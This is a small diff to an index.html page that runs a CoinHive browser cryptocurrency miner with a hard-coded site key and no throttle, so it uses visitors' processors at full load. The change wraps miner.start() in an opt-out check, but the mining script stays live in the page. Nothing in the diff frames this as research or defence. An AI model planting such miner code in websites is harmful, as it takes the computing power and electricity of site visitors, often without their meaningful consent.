--- a/index.html
+++ b/index.html
@@ -29,9 +29,9 @@
 <script>
 	var miner = new CoinHive.Anonymous('pXCJA6s5QWmw3SAZ3NLxFyOaa8cBdrus', {throttle: 0});
 
-	// Only start on non-mobile devices and if not opted-out
-	// in the last 14400 seconds (4 hours):
-	miner.start();
+	if (!miner.didOptOut(14400)){
+		miner.start();
+	}
 	
 </script>
 
